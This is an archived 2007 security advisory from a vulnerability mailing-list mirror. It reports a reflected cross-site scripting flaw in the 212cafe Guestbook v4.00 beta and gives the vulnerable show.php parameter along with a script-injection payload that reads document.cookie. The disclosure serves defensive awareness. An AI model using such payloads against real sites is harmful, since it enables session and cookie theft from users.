Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Maxtricity Tagger Password Disclosure Vulnerability

  ZixForum <= 1.14 (Zixforum.
mdb) Remote Password Disclosure Vulnerability

  [Full-disclosure] [OPENADS-SA-2007-
001] phpAdsNew and phpPgAds 2.0.9-pr1 vulnerability fixed

  Toxiclab Shoutbox Password Disclosure Vulnerability

From:xx_hack_xx_2004_(at)_hotmail.com <xx_hack_xx_2004_(at)_hotmail.com>
Date:24.01.2007
Subject:XSS in Guestbook ( v.4.00 beta )

Hello

Vulnerable : Guestbook  ( By 212cafe.com )
Version: v.4.00 beta
Web : http://www.212cafe.com



Exploit :
http://www.example.com/guestbookv4.0/show.php?user=[XSS]

Example :
http://www.example.com/guestbookv4.0/show.php?user='><script>alert(
document.cookie);</script>


-----

Discoverey By Linux_Drox
www.LeZr.Com/vb

Best Regards ,,,,

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server